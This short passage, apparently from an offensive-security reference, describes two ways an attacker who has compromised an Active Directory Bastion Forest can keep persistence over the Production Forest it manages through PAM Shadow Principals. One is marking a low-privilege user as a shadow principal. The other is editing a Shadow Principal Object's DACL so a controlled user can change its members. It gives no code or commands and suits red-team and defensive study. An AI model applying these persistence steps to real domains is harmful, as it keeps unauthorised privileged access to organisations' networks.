Shadow Principals (PAM)


When a Bastion Forest is compromised, there are multiple ways to obtain persistence on the forest it manages (i.e. called "Production Forest" here).
  1. 1.
    Mark a low-privilege user from the Production Forest as an Shadow Security Principal in the Bastion Forest
  2. 2.
    Modify a Shadow Principal Object's DACL: add ACEs over a Shadow Principal Object (at least Read Members and Write Members) allowing a controlled user add and remove principals at will (in the member attribute.